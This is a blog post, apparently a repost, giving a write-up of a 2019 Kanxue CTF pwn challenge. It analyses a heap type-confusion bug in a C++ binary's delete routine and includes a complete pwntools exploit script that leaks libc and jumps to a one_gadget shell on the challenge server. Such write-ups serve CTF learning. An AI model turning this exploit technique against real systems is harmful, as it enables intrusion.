2019看雪CTFQ1 C与C++

2024-01-15 17:48
文章标签 c++ 2019 看雪 ctfq1

本文主要是介绍2019看雪CTFQ1 C与C++,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

 漏洞类型

应该算个类型混淆吧

保护机制

[*] '~/candcpp'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000)FORTIFY:  Enabled

漏洞分析

v1 = (void (***)())ptr[a1];            //heap的mem指针if ( v1 ){v2 = &v1[3 * (_QWORD)*(v1 - 1)];    //v1-1是heap的size,v2=heap+8*3*size_of_heapwhile ( v2 != v1 ){while ( 1 ){v2 -= 3;                        //&v2-=0x18v3 = **v2;                       //取两层引用if ( v3 == nullsub_1 )break;((void (__fastcall *)(void (***)()))v3)(v2);//调用v3v1 = (void (***)())ptr[a1];if ( v2 == v1 )goto LABEL_6;}}
LABEL_6:operator delete[](v2 - 1);}ptr[a1] = 0LL;

 c++的delete功能中,没有检测是不是有c++的new分配的空间。理论上,可以根据size的大小,去分配相应大小的堆以控制对应v2的内容,从而能够控制v3函数指针,达到控制程序流的目的。

比如以下,我将size控制到最小——0x21,这样的话实际上我需要控制heap+3*8*0x21之前的部分内存,以方便在v2-=3的时候,能生成调用流heap+3*8*0x21-3*8->heap+3*8*0x21-3*8-3*8......

#建个0x20的堆
ru('>> ')
sl(1)
sl(0)
#建个比较大的堆
malloc(0x1d3,'A'*(0x1cb-0x10)+p64(name+8)+'B'*7+p64(name))#对应的堆的调试信息
#heap
0x2239e60 FASTBIN {mchunk_prev_size = 0, mchunk_size = 33,    #0x21 fd = 0x0, bk = 0x0, fd_nextsize = 0x0, bk_nextsize = 0x311
}
0x2239e80 PREV_INUSE {mchunk_prev_size = 0, mchunk_size = 785,     #0x311fd = 0x0, bk = 0x4141414141414141, fd_nextsize = 0x41414141414141, bk_nextsize = 0x0
}
#####################
pwndbg> x/120gx 0x2239e60
0x2239e60:	0x0000000000000000	0x0000000000000021    #chunk0
0x2239e70:	0x0000000000000000	0x0000000000000000
0x2239e80:	0x0000000000000000	0x0000000000000311    #chunk1
0x2239e90:	0x0000000000000000	0x4141414141414141
0x2239ea0:	0x0041414141414141	0x0000000000000000
0x2239eb0:	0x4141414141414141	0x0041414141414141
0x2239ec0:	0x0000000000000000	0x4141414141414141
0x2239ed0:	0x0041414141414141	0x0000000000000000
0x2239ee0:	0x4141414141414141	0x0041414141414141
...             struct{
...             QWORD* vtable;    //malloc 方式保存为0
...             15字节的data+'\x00'    //16字节
...             }
0x223a130:	0x0000000000000000	0x4141414141414141
0x223a140:	0x0041414141414141	0x0000000000000000
0x223a150:	0x4141414141414141	0x0000000000602330     #0x2239e70+0x21*3*8-3*8-3*8=0x223a158
0x223a160:	0x0000000000000000	0x4242424242424200
0x223a170:	0x0000000000602328	0x0000000000000000    #0x2239e70+0x21*3*8-3*8=0x223a188-3*8 = 0x223a170
0x223a180:	0x0000000000000000	0x0000000000000000
0x223a190:	0x0000000000000000	0x000000000000ee71    #top chunk

由堆的调试的信息看出我们输入的信息是分块保存,每块前8个字节是0,接着15字节保存数据,最后一个字节截断为'\x00'。

__int64 sub_400E10()
{signed __int64 v1; // [rsp-8h] [rbp-8h]v1 = '\np%';return __printf_chk(0LL, (__int64)&v1);    //格式化字符串,printf("%p\n");
}

 通过menu菜单里一个隐蔽的函数,可以泄露puts地址。

利用思路

根据以上分析,我在内存中选择一块可控区域,放入0x400e10函数指针,泄露libc。然后控制堆上的内容,返回main函数利用libc调用one_gadget。

1、在一开始输入name的时候可以输入16字节的内容,这里就输入两个函数,0x400e10和main

2、泄露puts地址返回main后,再次写入name为one_gadget,重新触发调用name的函数指针,getshell

EXP

from PwnContext import *#try:
#    from IPython import embed as ipy
#except ImportError:
#    print ('IPython not installed.')# context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
#context.log_level = 'debug'
# functions for quick script
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
st      = lambda delim,data         :ctx.sendthen(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
slt     = lambda delim,data         :ctx.sendlinethen(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
leak    = lambda address, count=0   :ctx.leak(address, count)
dbg     = lambda *args, **kwargs    :ctx.debug(*args, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))#ctx.binary = './candcpp'
#ctx.breakpoints = [0x400a62,0x400dae]#after malloc
ctx.remote_libc = './libc-2.23.so'
ctx.remote = ('154.8.222.144', 9999)
ctx.debug_remote_libc = False# True for debugging remote libc, false for local.
#rs()rs('remote') # uncomment this for exploiting remote target
libc = ctx.libc # ELF object of the corresponding libc.
# ipy() # if you have ipython, you can use this to check variables.
def malloc(length,string):ru(">> ")sl(1)sl(length)sl(string)
def delete(index):ru(">> ")sl(4)sl(index)
#leak libc
puts = 0x400e10
main = 0x4009a0
name = 0x602328
sl(p64(puts)+p64(main))ru('>> ')
sl(1)
sl(0)
malloc(0x1d3,'A'*(0x1cb-0x10)+p64(name+8)+'B'*7+p64(name))
#dbg()
delete(0)
ru('Please input index of the string\n')
libc_base = int(r(14),16)
success('leak addr: {}'.format(hex(libc_base)))
libc_base -=libc.symbols['puts']
success('leak libc: {}'.format(hex(libc_base)))#write ones
#dbg()
print one_gadgets('libc-2.23.so')
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:rcx == NULL0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:[rsp+0x40] == NULL0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:[rsp+0x70] == NULLremote
[283158, 283242, 983716, 987463]
'''
one=983716+libc_base
sl(p64(one))
delete(0)
irt()

 这里不得不吐槽依稀CSDN的上传图片的功能,不能直接复制粘贴,还得先保存图片后上传到服务器,才能用。。

这篇关于2019看雪CTFQ1 C与C++的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/609711

相关文章

C++11范围for初始化列表auto decltype详解

C++11范围for初始化列表auto decltype详解

《C++11范围for初始化列表autodecltype详解》C++11引入auto类型推导、decltype类型推断、统一列表初始化、范围for循环及智能指针,提升代码简洁性、类型安全与资源管理效... 目录C++11新特性1. 自动类型推导auto1.1 基本语法2. decltype3. 列表初始化3
阅读更多...
C++11右值引用与Lambda表达式的使用

C++11右值引用与Lambda表达式的使用

《C++11右值引用与Lambda表达式的使用》C++11引入右值引用,实现移动语义提升性能,支持资源转移与完美转发;同时引入Lambda表达式,简化匿名函数定义,通过捕获列表和参数列表灵活处理变量... 目录C++11新特性右值引用和移动语义左值 / 右值常见的左值和右值移动语义移动构造函数移动复制运算符
阅读更多...
C++中detach的作用、使用场景及注意事项

C++中detach的作用、使用场景及注意事项

《C++中detach的作用、使用场景及注意事项》关于C++中的detach,它主要涉及多线程编程中的线程管理,理解detach的作用、使用场景以及注意事项,对于写出高效、安全的多线程程序至关重要,下... 目录一、什么是join()?它的作用是什么?类比一下:二、join()的作用总结三、join()怎么
阅读更多...
C++中全局变量和局部变量的区别

C++中全局变量和局部变量的区别

《C++中全局变量和局部变量的区别》本文主要介绍了C++中全局变量和局部变量的区别,全局变量和局部变量在作用域和生命周期上有显著的区别,下面就来介绍一下,感兴趣的可以了解一下... 目录一、全局变量定义生命周期存储位置代码示例输出二、局部变量定义生命周期存储位置代码示例输出三、全局变量和局部变量的区别作用域
阅读更多...
C++中assign函数的使用

C++中assign函数的使用

《C++中assign函数的使用》在C++标准模板库中,std::list等容器都提供了assign成员函数,它比操作符更灵活,支持多种初始化方式,下面就来介绍一下assign的用法,具有一定的参考价... 目录​1.assign的基本功能​​语法​2. 具体用法示例​​​(1) 填充n个相同值​​(2)
阅读更多...
c++ 类成员变量默认初始值的实现

c++ 类成员变量默认初始值的实现

《c++类成员变量默认初始值的实现》本文主要介绍了c++类成员变量默认初始值,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧... 目录C++类成员变量初始化c++类的变量的初始化在C++中,如果使用类成员变量时未给定其初始值,那么它将被
阅读更多...
C++中NULL与nullptr的区别小结

C++中NULL与nullptr的区别小结

《C++中NULL与nullptr的区别小结》本文介绍了C++编程中NULL与nullptr的区别,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编... 目录C++98空值——NULLC++11空值——nullptr区别对比示例 C++98空值——NUL
阅读更多...
C++ Log4cpp跨平台日志库的使用小结

C++ Log4cpp跨平台日志库的使用小结

《C++Log4cpp跨平台日志库的使用小结》Log4cpp是c++类库,本文详细介绍了C++日志库log4cpp的使用方法,及设置日志输出格式和优先级,具有一定的参考价值,感兴趣的可以了解一下... 目录一、介绍1. log4cpp的日志方式2.设置日志输出的格式3. 设置日志的输出优先级二、Window
阅读更多...
从入门到精通C++11 <chrono> 库特性

从入门到精通C++11 <chrono> 库特性

《从入门到精通C++11<chrono>库特性》chrono库是C++11中一个非常强大和实用的库,它为时间处理提供了丰富的功能和类型安全的接口,通过本文的介绍,我们了解了chrono库的基本概念... 目录一、引言1.1 为什么需要<chrono>库1.2<chrono>库的基本概念二、时间段(Durat
阅读更多...
C++20管道运算符的实现示例

C++20管道运算符的实现示例

《C++20管道运算符的实现示例》本文简要介绍C++20管道运算符的使用与实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧... 目录标准库的管道运算符使用自己实现类似的管道运算符我们不打算介绍太多,因为它实际属于c++20最为重要的
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2